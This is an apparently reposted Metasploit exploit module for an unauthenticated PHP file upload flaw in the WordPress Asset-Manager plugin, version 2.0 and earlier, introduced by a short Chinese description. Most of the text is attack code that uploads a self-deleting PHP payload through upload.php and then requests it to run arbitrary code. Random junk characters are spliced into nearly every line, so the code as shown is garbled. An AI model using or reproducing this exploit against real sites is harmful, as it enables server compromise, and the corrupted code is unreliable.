这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
2 {* Y" N- ~5 w* y- e0 E# y/ w/ x. ?& F
##) Z5 u# B. c: u9 n
# This file is part of the Metasploit Framework and may be subject to/ X4 f2 ?& O% q+ l
# redistribution and commercial restrictions. Please see the Metasploit5 a& B- v6 K$ b) @ X$ o+ T
# Framework web site for more information on licensing and terms of use.
) } N( w0 Q5 @# http://metasploit.com/framework/
0 H/ {; J. i- ]9 @. C- ~' |% \, o##) n2 e! u j6 x( e+ i/ ^
1 w2 T1 e$ {, d( H) h$ h7 |* E6 Arequire 'msf/core'
( Z+ A5 ~$ L! t& Orequire 'msf/core/exploit/php_exe'
" U$ j( Z" s8 g/ z" S5 G- T `" V
2 b; C: G6 K8 m: c, }" Y( `7 zclass Metasploit3 < Msf::Exploit::Remote
M, Z+ Z2 j5 J) m Rank = ExcellentRanking, K1 u2 }8 W! Y3 Y0 z, B& D
) w, e6 ?2 p" a, Y% f, g" { include Msf::Exploit::Remote::HttpClient
; z9 r/ B6 v0 a' F4 _. G* o include Msf::Exploit:hpEXE
4 l- L [( {" \# b8 w: b+ x $ L& _' E6 x' G- t
def initialize(info = {})/ [5 Q9 }" C0 c7 p6 k( i$ T6 Y
super(update_info(info,
( h3 f$ D7 A- X, ] 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',2 x$ X# m& q# O T( p
'Description' => %q{ G0 K7 R% Y3 j5 u: D0 U
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress( _: u! [5 b/ c: A! M: E6 O
plugin. By abusing the upload.php file, a malicious user can upload a file to a
% `2 _9 H' W9 u( G! I* v7 n temp directory without authentication, which results in arbitrary code execution.
: n8 ~! v, U) h& Y1 |4 V$ q. f }, u9 `; u8 x S$ X
'Author' =>( ]/ T/ E4 Z- Y' j. W5 U
[4 z" v4 D" N$ p
'Sammy FORGIT', # initial discovery* L, w' d$ {: ]/ C3 ?) R
'James Fitts <fitts.james[at]gmail.com>' # metasploit module( R6 u$ z7 S; D0 u) a0 z% t7 m0 @
],
, A, Z! i3 w( C% A! \. \" k 'License' => MSF_LICENSE,
% M, }! @1 t9 a; \ 'References' =>
5 a T4 M0 t' v1 H2 D! I [- Y/ U: S" N3 o) h
[ 'OSVDB', '82653' ],* A7 N7 v( b( u [0 ]
[ 'BID', '53809' ],% I! ^6 w9 V1 [- a& s* h
[ 'EDB', '18993' ],1 ~1 ]' K$ H( m# D2 \8 z# d1 M# `
[ 'URL', 'http:// www.myhack58.com /' ]
# O6 L4 v* q) x1 U" ? ],* |) u& C% k: l9 u
'Payload' =>
% F) _: i" t0 g, Z {
3 O# Y: `9 q* [9 |, K 'BadChars' => "\x00",8 _6 H1 U5 [' F' P
},
, m: A7 k0 Q) Z0 p$ l 'Platform' => 'php',6 u6 M9 O- ]! ^, Z
'Arch' => ARCH_PHP,
6 r$ H! I% Y5 k1 ?' `% I( {( o3 n 'Targets' =>
# B, d6 I4 [- ]# O+ H [
4 \3 a! ] ]* i5 y [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
8 V0 I: X. U# K4 ? [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
( J9 X5 z9 o* d ],$ k/ B+ ?0 a; w, V9 d
'DefaultTarget' => 0,9 X4 Q( u7 C) I' n- D B: F
'DisclosureDate' => 'May 26 2012'))
$ m# `6 m% k+ e$ A ; S: ^/ E: h2 l+ A
register_options(+ t+ {5 M: w" w
[
3 ?. l0 w0 q; ?- x7 z/ g OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])4 m$ A1 ]7 \. ~: ~: g$ p1 x
], self.class). k8 R4 n# ~3 {: n
end
1 S1 H6 M" \( ^, D0 } 3 X2 Y5 z8 J2 R) J ~- K, D
def exploit8 L) I8 B* J) _7 U
uri = target_uri.path
1 d) i, K1 P3 A" X% X% U uri << '/' if uri[-1,1] != '/'
( g% r @1 i) Y9 ~) { peer = "#{rhost}:#{rport}"
# O( D$ {8 I: m+ ?0 [ payload_name = "#{rand_text_alpha(5)}.php"! J4 t5 L# W" P; x; D6 }
php_payload = get_write_exec_payload(:unlink_self=>true)
- R4 g# n/ B; _9 Z. m
( @5 x7 Y3 g m data = Rex::MIME::Message.new3 U+ { r6 Z, s- R: V' z5 o
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")) P8 X( R% r8 u, D+ a2 F
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
6 }0 i' ~+ B; t; P7 h, V- Y6 g- O
6 l( t K7 s7 J0 R8 u5 S2 H) o print_status("#{peer} - Uploading payload #{payload_name}"): D, B/ _$ U4 B! A) L! } \& ?) S8 ?
res = send_request_cgi({
: t1 o0 J. v+ I2 F* u3 Y 'method' => 'POST',6 p+ A& M& P' x
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
/ r( {" A6 C( F3 V+ p 'ctype' => "multipart/form-data; boundary=#{data.bound}",6 K# _2 {5 |; d6 v
'data' => post_data) ?0 K( }$ C5 }& d$ C- \3 v
})$ P/ G. E# z3 n! E9 a! X
: R* T1 y* X8 {; h/ M( j& d if not res or res.code != 200 or res.body !~ /#{payload_name}/
) k9 S0 N8 x- O2 O+ b/ I7 r; D" R fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; S9 ^7 a7 V( j5 qend
s1 A+ ]5 v+ P+ L- p1 e( ~% g: K 9 ~' F9 q# p' X5 H( v
print_status("#{peer} - Executing payload #{payload_name}")5 ?, p% G8 c) {6 G; Z8 ]
res = send_request_raw({2 x3 B/ v3 ~2 A3 |5 h% [0 b+ Y
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
: ~8 w$ c" I! P/ @. E/ s ? 'method' => 'GET'- @! p$ q$ {" j! Y3 o
})" T' a/ c, ~/ t, {5 b& s3 r
6 M- Y) I# y; _- e
if res and res.code != 200
% L' D3 U- Z/ Q) ]- i) W fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")+ `! l. d6 L& C; L! K: Z8 u7 e. i
end
- [3 K, \! J1 c9 ]; p! `2 z& d end7 `/ {4 v: P8 F c; r0 {; K
end
) D- Q9 s% p' r' k, N" C" S |